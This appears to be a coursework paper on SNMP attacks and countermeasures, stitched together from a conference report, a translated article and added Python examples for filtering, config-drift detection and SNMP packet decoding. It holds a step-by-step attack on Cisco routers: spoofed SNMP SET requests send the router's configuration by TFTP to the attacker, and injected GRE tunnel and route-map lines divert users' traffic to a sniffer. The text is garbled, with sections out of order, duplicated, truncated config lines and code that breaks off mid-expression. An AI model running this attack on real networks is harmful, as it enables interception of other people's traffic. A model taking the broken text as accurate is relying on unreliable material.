SNMP protocol: methods of network attacks and defenses
CONTENT
INTRODUCTION
1. THEORETICAL BASIS OF THE PROBLEM OF RESEARCHING METHODS OF ATTACKS ON THE SNMP PROTOCOL
1.1 THE NEED FOR STUDYING METHODS OF ATTACKS ON THE SNMP PROTOCOL
1.2 SNMP PROTOCOL: DESCRIPTION, PURPOSE
2. ANALYSIS OF ATTACKS ON THE SNMP PROTOCOL AND COUNTERMEASURES
2.1 TECHNIQUES FOR ATTACKS ON THE SNMP PROTOCOL AND WAYS TO PREVENT THEM
2.2 WAYS TO COUNTER ATTACKS ON THE SNMP PROTOCOL
CONCLUSION
LIST OF SOURCES USED
Figure 3 - Screen form of the SoftPerfect Network Scanner utility

Patches
Manufacturers of many network devices develop so-called patches, which must be applied when vulnerabilities are detected in the system. Therefore, if you find SNMP-enabled devices on your network, it is a good idea to contact the manufacturers of those devices to find out whether they have released the necessary patches.

Disabling the SNMP service
Many experts believe that if the SNMP service is not needed, it should be disabled or removed. The procedure for disabling the SNMP service in Windows is as follows: open Start – Control Panel – Administrative Tools – Services (see Fig. 4); select the SNMP service; if the service is running, click the "Stop" button, then set "Startup type" to "Disabled".

Figure 4 - Disabling the SNMP service

It is worth noting that some potentially vulnerable products remain susceptible to DoS attacks or other actions that disrupt network stability even when SNMP is disabled.

Ingress filtering
Ingress filtering relies on configuring firewalls and routers to filter inbound traffic on UDP ports 161 and 162. This prevents attacks initiated from external networks against vulnerable devices in the local network. Other ports that support SNMP-related services, including TCP and UDP ports 161, 162, 199, 391, 750, and 1993, may also require ingress filtering.

Egress filtering
For effective protection, egress filtering can be implemented to control traffic leaving the network. Filtering outgoing traffic on UDP ports 161 and 162 at the network edge prevents your systems from being used as a springboard for an attack on others.

Intrusion detection and prevention systems
An Intrusion Detection System (IDS) is software or hardware that detects unauthorized entry (intrusion or network attack) into a computer system or network. Without an IDS, a network security infrastructure is unthinkable.
Complementing rule-based firewalls, IDS monitor for suspicious activity. They make it possible to identify intruders who have penetrated the firewall and report this to the administrator, who makes the decisions needed to maintain security. Intrusion detection methods do not guarantee complete system security. Using an IDS achieves the following goals:
- identifying a network attack or intrusion;
- forecasting likely future attacks and identifying system weaknesses to prevent their exploitation; in many cases the attacker performs a preparation phase, such as probing (scanning) the network or otherwise testing it to discover system vulnerabilities;
- documenting known threats;
- monitoring the quality of administration from a security perspective, particularly in large and complex networks;
- obtaining valuable information about intrusions that have occurred in order to restore the system and correct the factors that led to the intrusion;
- identifying the location of the attack source relative to the external network (external or internal attack), which allows the right decisions to be made when placing network nodes.
In general, an IDS contains:
- a surveillance subsystem, which collects information about security-relevant events in the protected network or system;
- an analysis subsystem, which detects suspicious activity and network attacks;
- a storage, which holds primary events and analysis results;
- a management console for configuring the IDS, monitoring the state of the protected system and the IDS, and studying situations detected by the analysis subsystem.
To summarize, the simplicity of the popular SNMP protocol results in increased vulnerability. Because SNMP is so widely used, operating networks with vulnerable products can have disastrous consequences. Therefore, to use the SNMP protocol effectively, various ways of preventing attacks should be applied and a comprehensive protection system built.
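The ingress and egress rules above, as an added example that is not part of the coursework: a small model of the edge filter applied to constructed packets, including the case of an SNMP packet arriving from outside with a spoofed local source address. The interface names and the 198.51.100.0/24 addresses are assumptions for the example; 192.168.1.0/24 is the local network used in the text.

```python
"""Ingress and egress filtering for SNMP at the network edge.

Added example (not from the coursework). Inbound on the external interface
the filter drops UDP 161/162 and any packet whose source claims to be a local
address (anti-spoofing); outbound it drops UDP 161/162 so local hosts cannot
be used as a springboard against others. Interface names and the
198.51.100.0/24 addresses are constructed for this example.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

SNMP_PORTS = {161, 162}
INTERNAL_NETS = [ip_network("192.168.1.0/24")]   # the local network in the text
EXTERNAL_IF = "Ethernet0/0"                        # assumed: faces the Internet
INTERNAL_IF = "Ethernet0/1"                        # assumed: faces the LAN


@dataclass
class Packet:
    in_if: str      # interface the packet arrived on
    src: str
    dst: str
    proto: str      # "udp" or "tcp"
    dport: int


def is_internal(addr: str) -> bool:
    a = ip_address(addr)
    return any(a in net for net in INTERNAL_NETS)


def filter_packet(p: Packet) -> tuple:
    """Return (verdict, reason); verdict is 'drop' or 'permit'."""
    if p.in_if == EXTERNAL_IF:
        # Ingress rules: anti-spoofing first, then the SNMP ports
        if is_internal(p.src):
            return "drop", "ingress: internal source address on external interface"
        if p.proto == "udp" and p.dport in SNMP_PORTS:
            return "drop", f"ingress: SNMP port {p.dport} from outside"
    elif not is_internal(p.dst) and p.proto == "udp" and p.dport in SNMP_PORTS:
        # Egress rule: SNMP must not leave the network
        return "drop", f"egress: SNMP port {p.dport} leaving the network"
    return "permit", "no rule matched"


# Constructed sample traffic
SAMPLE_PACKETS = [
    # arrives from outside but claims a LAN source (the spoofed-source case)
    Packet(EXTERNAL_IF, "192.168.1.5", "198.51.100.1", "udp", 161),
    # a genuine outside host polling the router's external address
    Packet(EXTERNAL_IF, "198.51.100.7", "198.51.100.1", "udp", 161),
    # the legitimate local management station
    Packet(INTERNAL_IF, "192.168.1.10", "192.168.1.1", "udp", 161),
    # a trap from inside addressed to an outside collector
    Packet(INTERNAL_IF, "192.168.1.10", "198.51.100.7", "udp", 162),
    # ordinary inbound HTTPS, unaffected by the SNMP rules
    Packet(EXTERNAL_IF, "198.51.100.7", "192.168.1.10", "tcp", 443),
]


def run(packets=SAMPLE_PACKETS):
    """Verdicts for a packet list, in order."""
    return [filter_packet(p)[0] for p in packets]
```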
LIST OF SOURCES USED
Regulatory acts
1. Federal Law of the Russian Federation of July 27, 2006 N 149-FZ On information, information technologies and information protection
List of specialized and scientific literature
2. Blank-Edelman D. Perl for system administration, M.: symbol-Plus, 2009.- 478 p.
3. Borodakiy V.Yu. Practice and prospects for creating a secure information and computing cloud based on MSS OGV / V.Yu. Borodakiy, A.Yu. Dobrodeev, P.A. Nashchekin // Current problems in the development of technological systems of state security, special communications and special information support: VIII All-Russian interdepartmental scientific conference: materials and reports (Orel, February 13–14, 2013). – In 10 parts. Part 4 / General ed. V.V. Mizerova. – Orel: Academy of the Federal Security Service of Russia, 2013.
4. Grishina N.V. Organization of a comprehensive information security system. - M.: Helios ARV, 2009. - 256 p.
5. Douglas R. Mauro SNMP Basics, 2nd edition / Douglas R. Mauro, Kevin J. Schmidt - M.: Symbol-Plus, 2012. - 725 p.
6. Kulgin M.V. Computer networks. Construction practice. For professionals, St. Petersburg: Peter, 2003.-462 p.
7. Mulyukha V.A. Methods and means of protecting computer information. Firewall: Textbook / Mulyukha V.A., Novopashenny A.G., Podgursky Yu.E. - St. Petersburg: SPbSPU Publishing House, 2010. - 91 p.
8. Olifer V. G., Olifer N. P. Computer networks. Principles, technologies, protocols. - 4th. - St. Petersburg: Peter, 2010. -902 p.
9. Switching and routing technologies in local computer networks: textbook / Smirnova E. V. et al.; ed. A.V. Proletarsky. – M.: Publishing house of MSTU im. N.E. Bauman, 2013. – 389 p.
10. Flenov M. Linux through the eyes of a Hacker, St. Petersburg: BHV-St. Petersburg, 2005. – 544 p.
11. Khoreyev P.V. Methods and means of protecting information in computer systems. – M.: publishing center "Academy", 2005. –205 p.
12. Khoroshko V. A., Chekatkov A. A. Methods and means of information protection, K.: Junior, 2003. - 504 p.
Internet sources
13. IDS/IPS - Intrusion detection and prevention systems [Electronic resource] URL: http://netconfig.ru/server/ids-ips/.
14. Analysis of Internet threats in 2014. DDoS attacks. Hacking websites. [Electronic resource]. URL: http://onsec.ru/resources/Internet%20threats%20in%202014.%20Overview%20by%20Qrator-Wallarm.pdf
15. Kolischak A. Format string vulnerability [Electronic resource]. URL: https://securityvulns.ru/articles/fsbug.asp
16. First Mile, No. 04, 2013 [Electronic resource]. URL: http://www.lastmile.su/journal/article/3823
17. SNMP family of standards [Electronic resource]. URL: https://ru.wikibooks.org/wiki /SNMP_standards_family
Foreign literature
18. "CERT Advisory CA-2002-03: Multiple Vulnerabilities in Many Implementations of the Simple Network Management Protocol (SNMP)", 12 Feb. 2002, (current March 11, 2002)
CONCLUSION
The study is devoted to the issues of ensuring the security of network interaction using the SNMP protocol. In the process of work, the features of the named protocol and possible problems with its use were identified. To substantiate the problem, statistical data are provided confirming the high probability of network attacks. In addition, the theoretical part contains information about the structure of the protocol, the request/response scheme and the stages of obtaining responses to requests.
As part of the course work, an analysis of possible attacks on the SNMP protocol was carried out, among which are DoS attacks, buffer overflow attacks and attacks exploiting format string vulnerabilities. Of course, there are many more potential threats, but their review requires a more in-depth and comprehensive study.
To build a system for protecting the network interaction of network subscribers, methods for preventing attacks on the SNMP protocol were considered and it was noted that the use of a set of tools would be effective.
Based on the analysis, it was revealed that the SNMP protocol is quite vulnerable and, if you still decide to use it, you should develop a security policy and adhere to all its principles.
Thus, we can conclude that the goal has been achieved and the tasks defined in the introduction have been solved.
INTRODUCTION
The rapid modern development of information technology places new demands on the storage, processing and distribution of data. From traditional storage media and dedicated servers, companies and individuals are gradually moving to remote technologies implemented through the global Internet. Internet services can become indispensable tools for the functioning of a modern, dynamically developing company; they include email; the exchange of files, voice messages and data using video applications; and the development of one's own Web resources.
According to many experts, the widespread use of Internet technologies requires the construction of a system for the effective management of network devices, and one of the tools for this can be the SNMP protocol. However, organizing the management and monitoring of network devices through this protocol makes network elements vulnerable to attacks. Thus, issues of technology for preventing network attacks in the light of the development of Internet services come to the fore and require comprehensive analysis. That is why the research topic is relevant.
The works of many authors have been devoted to the issues of building a system for protecting against attacks on the SNMP protocol, but there is no consensus on the advisability of using SNMP due to the complexity of ensuring its security. Thus, Flenov M. in his book "Linux through the eyes of a Hacker" highlighted the disadvantages of this protocol and does not recommend its use. Smirnova E. V., in the textbook "Switching and routing technologies in local computer networks", provides information on multicast data transmission schemes and the effective management of network equipment using the SNMP protocol, and also separately highlights the security issues of its use. A further review of specialized literature and Internet sources confirmed the need to study the issues of secure use of the SNMP protocol in order to decide on the advisability of its use. The basis for this decision will be an analysis of possible attacks and of the effectiveness of methods to prevent them.
The purpose of the study is to conduct a comprehensive analysis of possible attacks on the SNMP protocol and countermeasures.
To achieve the goal, it is necessary to solve a number of problems:
1. Conduct a review of literature and Internet sources on the organization of secure network interaction based on the use of the SNMP protocol.
2. Justify the need to study methods of attacks on the SNMP protocol and ways to prevent them.
3. Highlight the features of management based on the SNMP protocol.
4. Conduct an analysis of attack techniques against the SNMP protocol.
5. Describe methods for preventing attacks on the SNMP protocol.
The object of study is the SNMP protocol.
The subject of the research is methods of network attacks on the SNMP protocol and ways to prevent them.
Research methods: analysis, synthesis, study of information sources.
The course work consists of an introduction, two chapters and a conclusion. The first chapter is devoted to the theoretical basis of the problem. The second chapter contains an analysis of possible attacks and ways to prevent them.
Information Security - 2006
Report
SNMP: a convenient protocol or a threat to the corporate network?
- SNMP background
SNMP (Simple Network Management Protocol) provides methods for managing network resources.
The history of the SNMP (Simple Network Management Protocol) protocol begins with its predecessor SGMP (Simple Gateway Monitoring Protocol), which was defined in RFC 1028 in 1987. SGMP was developed as a temporary solution to network management.
The SGMP standard defined the basic design model used in SNMP, describing the SGMP protocol only in terms of lookups and/or changes to variables stored on the router. This standard also stands out for its small number of operations, which are still the basis of SNMP operations today.
The first version of the SNMP framework, SNMPv1, was defined in RFC 1067 (later revised into RFCs 1098 and 1157) in 1993.
The new SNMPv2 specification was released in 1996 and included improvements such as a blocking mechanism, 64-bit counters, and improved error reporting.
The most recent addition to the protocol is SNMPv3, defined in 1999. Basically this is the same SNMPv2, but with improvements from a security point of view, such as: Security Model (protection model) and Access Control Model (access control model).
- Effective network control
SNMP can be used to manage any system connected to the Internet
The costs of implementing SNMP are minimal
By defining new "Managed Objects" (MIBs), management capabilities can be expanded easily
SNMP is quite robust; even in the event of failures, the manager can continue to work (although it may take a little more effort)
Currently, device manufacturers enable SNMP by default. This protocol has become the most important standard for network management.
- Is SNMP a threat?
Depending on the version of the SNMP standard and the correct configuration of the equipment, this protocol can be used in many areas of hacking, from petty hooliganism to effective industrial espionage.
System administrators often have only a vague understanding of SNMP. Because the purpose of this protocol is poorly understood, and, accordingly, the potential problems are unknown, its security issues are often overlooked.
The fact that SNMP is based on UDP makes it even more interesting. As a connectionless protocol, UDP is vulnerable to IP spoofing attacks. If your organization has Cisco equipment, let us look at what can be done with it using SNMP.
Attack scenario 1.
Below is the current configuration of the attacked router (Victim Router):
Current configuration: 1206 bytes
enable secret 5 $1$h2iz$DHYpcqURF0APD2aDuA. YX0
interface Ethernet0/0
interface Ethernet0/1
ip address 192.168.0
network 192.168.1.0
ip nat inside source list 102 interface Ethernet0/0 overload
no ip http server
access-list 1 permit 192.168.
access-list 102 permit ip any any
snmp-server community public RO
snmp-server community private RW 1
snmp-server enable traps tty
logging synchronous
Pay attention to the access rule for the RW group. This rule attempts to limit SNMP read/write access to only users on the local network (192.168.1.0).
There are two main stages of the attack:
1. Bypassing the SNMP access rules on the attacked router in order to obtain its configuration file.
2. Creating a GRE tunnel between the attacked router and the hacker's router in order to remotely intercept the traffic of the victim's client machine (Victim Client).
Theory
Using the SNMP SET command, a Cisco router can be made to overwrite or send its configuration file via TFTP.
By sending an SNMP SET request with a spoofed IP address (from the range described in RFC10), we can force the attacked router to send us its configuration file. This assumes that we know the 'private' community string and the ACL referenced in the RW community configuration line.
Bypassing SNMP Access Rules
Let's start by creating a spoofed SNMP request. Using a small Perl script and Ethereal, we will capture a standard SNMP SET "copy config" request, which we will use as the base packet.
root@whax# ./copy-router-config.pl
######################################################
# Copy Cisco Router config - Using SNMP
# Hacked up by muts - *****@***co.il
#######################################################
Usage: ./cisco-copy-config.pl
Make sure a TFTP server is set up, preferably running from /tmp!
After executing the script, the SNMP packet will be intercepted. As expected, this request was rejected by the router and the configuration file was not sent.
Note the attacker's IP address (80.179.76.227). Now, using a hex editor, we change this IP address and some other packet header fields. In hexadecimal notation the spoofed IP address 192.168.1.5 looks like C0 A8
We will then send the packet using file2cable (or any other packet generator).
The packet bypasses SNMP access rules, and we receive the configuration file of the attacked router via TFTP.
GRE tunnel
GRE (Generic Routing Encapsulation) is a tunneling protocol designed to encapsulate arbitrary types of network layer packets within a network layer packet. One of the options for using GRE is to connect IPX network segments through a communication channel that supports only the network layer of the OSI model. In this case, you will need to create a GRE tunnel from one router to another to send IPX packets back and forth over an IP-only link.
However, we will use the GRE for purposes other than its normal purpose. Our plan is as follows:
- Create a GRE tunnel from the attacked router to the hacker's router.
- Determine what traffic will pass through the tunnel.
- Unpack the GRE packets coming from the attacked router and forward them to the attacker's computer (sniffer) for analysis.
Attacked router
We need to create a GRE tunnel on the attacked router. Since we do not have access to a terminal (console), we can simply edit the configuration file we obtained and then send it back to the router using a spoofed SNMP SET request. Let's add the following lines to the configuration file of the attacked router:
interface tunnel0
ip address 192.168.10
tunnel source Ethernet0/0
tunnel destination
tunnel mode gre ip
They mean the following:
- We created an interface tunnel0 and assigned it an IP address from the 192.168.10.x network. For data to be exchanged, both ends of the tunnel must be on the same subnet.
- We specified the Ethernet0/0 interface as the beginning of the tunnel (otherwise, where could the tunnel begin?).
- The end of the tunnel is the IP address of the external interface of the hacker's router.
- The last command is not required, since a GRE tunnel is created by default anyway (but we added it to be sure).
Now we can configure access rules (access-lists) to specify the type of traffic passing through the tunnel and routing maps (route-maps) necessary to redirect traffic.
To do this, add a few more lines to the configuration file of the attacked router:
access-list 101 permit tcp any any eq 443
access-list 101 permit tcp any any eq 80
access-list 101 permit tcp any any eq 21
access-list 101 permit tcp any any eq 20
access-list 101 permit tcp any any eq 23
access-list 101 permit tcp any any eq 25
access-list 101 permit tcp any any eq 110
We have allowed data transfer via SSL, HTTP, FTP, telnet, SMTP and POP3 protocols.
Now, if the traffic matches the rules described above, it will be redirected in accordance with the routing maps, the description of which must be added to the configuration file:
route-map divert-traffic
match ip address 101
set ip next-hop 192.168.10.2
interface Ethernet0/0
ip policy route-map divert-traffic
- We created an access rule that allows all types of traffic.
- We created a divert-to-sniffer routing map (this routing map will redirect tunneled traffic to the sniffer). The created access rule is used as the match condition.
- We specified the IP address of the attacker (sniffer) as the next-hop address.
- We applied the routing map to the tunnel0 interface.
It is very important that we use a routing map to forward data. The router receives tunneled data encapsulated in a GRE packet, and without decoding the packet we cannot view it. By forwarding received packets to the attacker (sniffer), the router transmits them as regular IP packets without GRE encapsulation.
Finally, let's create a routing map and associate it with the Ethernet0/0 interface:
Attacker(config-if)# route-map divert-out
Attacker(config-route-map)# match ip address 101
Attacker(config-route-map)# set ip next-hop 192.168.10.1
Attacker(config-route-map)# exit
Attacker(config)# interface ethernet0/0
Attacker(config-if)# ip policy route-map divert-out
These additional settings mean the following:
- After the attacker (sniffer) intercepts the tunneled data and forwards it back, the divert-out routing map redirects the traffic back to the attacked router.
- We applied the routing map to the Ethernet interface.
Let's start the attack
After all the settings are completed, all we have to do is upload a new modified configuration file to the attacked router. The result will be the activation of the GRE tunnel and the redirection of all traffic from the local network of the attacked computer to the hacker (sniffer).
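The change that activates the tunnel is an edit to the router's configuration file, so a defender who keeps a known-good copy of the running configuration can catch it by diffing. The following is an added example, not code from the original report: it compares a baseline against the current configuration and reports added lines of the kinds shown above (tunnel interfaces, policy routing, new access-lists, SNMP community changes). Both configurations are constructed from the fragments on this page; the tunnel endpoint address is a placeholder.

```python
"""Configuration drift check for a Cisco IOS router.

Added example (not from the original report): diffs a known-good baseline
against the current configuration and flags added lines that match the
changes used to divert traffic above. Both configurations are constructed
samples; <ATTACKER_ROUTER_IP> is a placeholder for the tunnel endpoint.
"""
import re

# Added lines that should never appear without a change record
SUSPICIOUS = [
    (r"^interface tunnel", "new tunnel interface"),
    (r"^tunnel (source|destination|mode)", "tunnel endpoint configured"),
    (r"^route-map ", "new route-map (policy routing)"),
    (r"^ip policy route-map", "policy routing applied to an interface"),
    (r"^set ip next-hop", "next-hop override inside a route-map"),
    (r"^access-list \d+ permit", "new access-list entry"),
    (r"^snmp-server community", "SNMP community changed"),
]


def normalize(config: str):
    """Strip indentation, comment lines ('!') and blank lines; keep order."""
    lines = []
    for raw in config.splitlines():
        line = raw.strip()
        if line and not line.startswith("!"):
            lines.append(line)
    return lines


def config_drift(baseline: str, current: str):
    """Return (added, removed, alerts); alerts is a list of (line, reason)."""
    base, cur = normalize(baseline), normalize(current)
    base_set, cur_set = set(base), set(cur)
    added = [line for line in cur if line not in base_set]
    removed = [line for line in base if line not in cur_set]
    alerts = []
    for line in added:
        for pattern, reason in SUSPICIOUS:
            if re.match(pattern, line, re.IGNORECASE):
                alerts.append((line, reason))
                break                      # one reason per added line
    return added, removed, alerts


# Constructed baseline, modelled on the Victim Router fragment
BASELINE = """\
interface Ethernet0/0
interface Ethernet0/1
ip nat inside source list 102 interface Ethernet0/0 overload
access-list 102 permit ip any any
snmp-server community private RW 1
"""

# The configuration after the modification described above (constructed;
# the tunnel0 address completes the 192.168.10.x network from the text)
MODIFIED = BASELINE + """\
interface tunnel0
 ip address 192.168.10.1 255.255.255.0
 tunnel source Ethernet0/0
 tunnel destination <ATTACKER_ROUTER_IP>
 tunnel mode gre ip
access-list 101 permit tcp any any eq 443
access-list 101 permit tcp any any eq 80
route-map divert-traffic
 match ip address 101
 set ip next-hop 192.168.10.2
interface Ethernet0/0
 ip policy route-map divert-traffic
"""
```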
You can check the functionality of the tunnel by sending a debugging command to the attacker’s router:
Attacker# debug tunnel
-> 212.199.145.242, tos=0x0
*Mar 3 06:38: Tunnel0: GRE/IP to classify 212.199.145.242
->80.179.20.55 (len=108 type=0x800 ttl=253 tos=0x0)
*Mar 3 06:38: Tunnel0: adjacency fixup, 80.179.20.55
-> 212.199.145.242, tos=0x0g all
As a result of these actions, Ethereal on the attacker’s computer will receive the following packets:
A few hours later, we receive scan data:
The received data contains the following type of information:
- SysName - can reveal the subscriber's address and phone number
- Agent IP Address
- DNS
- Response Time
- Vendor
- System Description - can be used as additional useful information during attacks
- Community - the snmp-community with which the information was extracted
- Location - can reveal the subscriber's address and phone number
- Contact - can reveal the administrator's name and nickname
- Last Boot Time
- Interfaces - the more, the more interesting
- Discovery Status
From the received data we take the IP addresses and use the Real-time Network Monitor program to find out what useful information can be obtained through additional SNMP requests.
It is also quite possible to get full access to the device simply by replacing the snmp-community name from public to private. This gives us the opportunity to send various snmp commands.
Result of the attack:
After this experiment we learned that:
- even the simplest protection method, access-lists, is not used;
- the number of the provider's clients can easily be found out;
- confidential information about the provider's clients is exposed;
- the economic potential of the provider is exposed;
- useful information that can be used in various attacks is exposed;
- statistics on the provider and its corporate clients can easily be collected for further use for certain purposes.
- Is it possible to prevent the attack? Protection methods
Sometimes some things are not what they seem. When dealing with SNMP (or other UDP-based protocols), you always need to be aware of the nooks and crannies that, if overlooked, could cause your network to be compromised.
Protection methods are extremely simple. They depend entirely on network administrators:
- do not leave hardware settings at their defaults;
- think through the scheme for using the protocol correctly;
- define complex snmp-community names;
- use access lists;
- specify single IP addresses in access lists, not IP ranges.
Conclusion
The goal of the work was to show not so much the effectiveness of the described attack as the potential gaps in UDP-based protocols. This in no way means that Cisco/ZyXel equipment is unsafe. Proper configuration should minimize the chances of bypassing protection. Errors by network administrators are the main reason network equipment is compromised.
SNMP is an application-level protocol designed for the TCP/IP stack, although there are implementations for other stacks, such as IPX/SPX. The SNMP protocol is used to obtain information from network devices about their status, performance and other characteristics, which are stored in the Management Information Base (MIB). The simplicity of SNMP is largely due to the simplicity of the SNMP MIBs, especially their first versions, MIB I and MIB II. In addition, the SNMP protocol itself is also very simple.
An agent in the SNMP protocol is a processing element that provides managers located at network management stations with access to the values of MIB variables and thereby enables them to implement functions for managing and monitoring the device.
The main management operations are carried out in the manager, and the SNMP agent most often plays a passive role, transferring the values of accumulated statistical variables to the manager upon its request. In this case, the device operates with minimal overhead for maintaining the control protocol. It uses almost all of its processing power to perform its basic functions as a router, bridge, or hub, and the agent collects statistics and device state variable values and reports them to the management system manager.
SNMP is a request-response protocol: for every request received from the manager, the agent must send a response. A special feature of the protocol is its extreme simplicity; it includes only a few commands.
The Get-request command is used by the manager to obtain from the agent the value of an object by its name.
The GetNext-request command is used by the manager to retrieve the value of the next object (without specifying its name) by sequentially scanning the object table.
Using the Get-response command, the SNMP agent sends the manager a response to the Get-request or GetNext-request commands.
The Set command is used by the manager to change the value of an object. The Set command is what actually controls the device. The agent must understand the meaning of the values of the object that is used to manage the device and, based on these values, perform the actual control action: disable a port, assign a port to a specific VLAN, etc. The Set command is also suitable for setting the condition under which the SNMP agent should send a corresponding message to the manager. The response to events such as agent initialization, agent restart, connection loss, connection restoration, incorrect authentication, and loss of the nearest router can be defined. If any of these events occur, the agent issues a trap.
The Trap command is used by the agent to notify the manager that an exception has occurred.
SNMP v.2 adds the GetBulk command to this set, which allows the manager to obtain multiple variable values in one request.
Attack on Cisco via SNMP
Alexander Antipov
Mati Aharoni and William M. Hidalgo, translation by Vladimir Kuksenok
Introduction
Often system administrators have only a vague understanding of SNMP. Because the purpose of this protocol is poorly understood, and its potential problems are therefore unknown, its security issues are often overlooked. You might be surprised the first time you see the output of a utility like Philip Waeytens' SNMP-Enum run against a Windows 2000 Server with the SNMP service enabled. The information collected could greatly puzzle a system administrator and gives an idea of the rich capabilities of SNMP.
The fact that SNMP is based on UDP makes it even more interesting. As a connectionless protocol, UDP is vulnerable to IP spoofing attacks. If your organization has Cisco routers, you're ready to explore what you can do with them using SNMP.
Attack Scenario
Take a look at the example attack scenario shown in Figure 1.
Figure 1. Example attack scenario.
Review the attack scenario. Below is the current configuration of the attacked router (Victim Router):
Current configuration : 1206 bytes
!
version 12.3
!
hostname Victim
!
enable secret 5 $1$h2iz$DHYpcqURF0APD2aDuA.YX0
!
interface Ethernet0/0
 ip address dhcp
 ip nat outside
 half-duplex
!
interface Ethernet0/1
 ip address 192.168.1.1 255.255.255.0
 ip nat inside
 half-duplex
!
router rip
 network 192.168.1.0
!
ip nat inside source list 102 interface Ethernet0/0 overload
no ip http server
ip classless
!
access-list 1 permit 192.168.1.0 0.0.0.255
access-list 102 permit ip any any
!
snmp-server community public RO
snmp-server community private RW 1
snmp-server enable traps tty
!
line con 0
 logging synchronous
 login
line aux 0
line vty 0 4
 password secret
 login
!
!
end
Pay attention to the access rule for the RW group. This rule attempts to limit SNMP read/write access to only users on the local network (192.168.1.0).
There are two main stages of the attack:
- Bypassing SNMP access rules on the attacked router in order to gain access to the router configuration file.
- Creating a GRE tunnel between the attacked router and the hacker’s router to remotely intercept traffic from the attacked client machine (Victim Client).
Theory
As mentioned in the article "Exploiting Cisco Routers, Part 1", using the SNMP SET command you can force a Cisco router to overwrite or send its configuration file using TFTP. By sending an SNMP SET request with a fake source IP address (from the RFC1918 range used here, 192.168.1.0) we should be able to force the attacked router to send us its configuration file. This assumes that we know the 'private' community string and the ACL referenced in the RW community configuration line.
Bypassing SNMP Access Rules
Let's start by creating a fake SNMP request. Using a small Perl script and Ethereal, we will intercept a standard SNMP SET "copy config" request, which we will use as a base packet.
root@whax# ./copy-router-config.pl
######################################################
# Copy Cisco Router config - Using SNMP
# Hacked up by muts - [email protected]
######################################################
Usage: ./cisco-copy-config.pl
Make sure a TFTP server is set up, preferably running from /tmp !
root@whax#
After executing the script, an SNMP packet similar to the one shown in Figure 2 will be captured. As expected, this request was rejected by the router and the configuration file was not sent.
Figure 2. Intercepted SNMP packet.
Pay attention to the attacker's IP address (80.179.76.227). Now, using a hex editor, we will change this IP address and some other packet header fields. In hexadecimal notation, the spoofed IP address 192.168.1.5 looks like C0 A8 01 05, as shown in Figure 3.
Figure 3. Changing the return IP address of a packet.
Then we will send the packet using file2cable (or any other packet generator):
root@whax:~# file2cable -v -i eth0 -f /root/snmp-mod
file2cable - by FX
Thanx go to Lamont Granquist & fyodor for their hexdump()
/root/snmp-mod - 238 bytes raw data
Packet length: 238
root@whax:~#
After this, our TFTP server accepts the connection; the Ethereal log of it is shown in Figure 4.
Figure 4. Connection to a TFTP server intercepted by Ethereal.
Note the return IP address of the SNMP packet and the TFTP write request (packets 1 and 2). The packet bypasses SNMP access rules, and we receive the configuration file of the attacked router via TFTP.
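Added detection example, not part of the original article: a Python decoder for SNMPv1/v2c messages that names the PDU types listed earlier and flags a SET request against the Cisco config-copy table (ccCopyTable, the object family that appears in the router's debug output further on), marking as likely spoofed any request whose source lies inside the RW ACL range but arrives on an interface other than the inside one. The packet bytes, the TFTP address 192.0.2.10, the file name and the interface check are constructed for the example.

```python
"""Decode an SNMPv1/v2c message and flag SET requests aimed at the Cisco config-copy
table (ccCopyTable, 1.3.6.1.4.1.9.9.96.1.1.1). Added detection example; the sample
packet is constructed here, not captured from the article."""
from ipaddress import ip_address, ip_network

CC_COPY_ENTRY = "1.3.6.1.4.1.9.9.96.1.1.1"
PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse",
             0xA3: "SetRequest", 0xA4: "Trap", 0xA5: "GetBulkRequest"}

def _tlv(buf, pos):
    """Read one BER tag-length-value at pos; return (tag, value bytes, next pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                        # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def _decode_oid(body):
    """Dotted OID from a BER OID body: first byte packs arcs 1-2, the rest are base-128."""
    arcs, acc = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))

def decode_snmp(payload):
    """Return version, community, PDU type, request-id and the varbind OIDs of one message."""
    _, msg, _ = _tlv(payload, 0)                         # outer SEQUENCE
    _, ver, p = _tlv(msg, 0)
    _, community, p = _tlv(msg, p)
    pdu_tag, pdu, _ = _tlv(msg, p)
    _, reqid, p = _tlv(pdu, 0)
    _, _, p = _tlv(pdu, p)                               # error-status
    _, _, p = _tlv(pdu, p)                               # error-index
    _, vbl, _ = _tlv(pdu, p)
    oids, p = [], 0
    while p < len(vbl):
        _, vb, p = _tlv(vbl, p)
        oids.append(_decode_oid(_tlv(vb, 0)[1]))         # first element of a VarBind is its OID
    return {"version": int.from_bytes(ver, "big"), "community": community.decode("latin-1"),
            "pdu": PDU_NAMES.get(pdu_tag, hex(pdu_tag)),
            "request_id": int.from_bytes(reqid, "big"), "oids": oids}

def config_copy_alert(src_ip, ingress_iface, payload,
                      trusted_net="192.168.1.0/24", inside_iface="Ethernet0/1"):
    """Alert string for a SET that writes ccCopyTable, else None. A source inside the RW
    ACL range arriving on any interface but the inside one is the spoofed-request case."""
    m = decode_snmp(payload)
    if m["pdu"] != "SetRequest" or not any(o.startswith(CC_COPY_ENTRY) for o in m["oids"]):
        return None
    alert = f"config-copy SET community={m['community']!r} from {src_ip} on {ingress_iface}"
    if ip_address(src_ip) in ip_network(trusted_net) and ingress_iface != inside_iface:
        alert += " [trusted address on untrusted interface: likely spoofed]"
    return alert

# Constructed sample: SNMPv1 SET, community "private", three ccCopyEntry columns
# (ccCopyProtocol = 1/tftp, ccCopyServerAddress = 192.0.2.10, ccCopyFileName = "router.config").
_CC_COL = "2b 06 01 04 01 09 09 60 01 01 01 01 "          # 1.3.6.1.4.1.9.9.96.1.1.1.1
SAMPLE_SET = bytes.fromhex(
    "30 6b 02 01 00 04 07 70 72 69 76 61 74 65 a3 5d "     # SEQUENCE, v1, "private", SetRequest
    "02 02 30 39 02 01 00 02 01 00 30 51 "                 # request-id 12345, errstat, erridx, VarBindList
    "30 14 06 0f " + _CC_COL + "02 89 52 02 01 01 "        # .2.1234 = INTEGER 1
    + "30 17 06 0f " + _CC_COL + "05 89 52 40 04 c0 00 02 0a "   # .5.1234 = IpAddress 192.0.2.10
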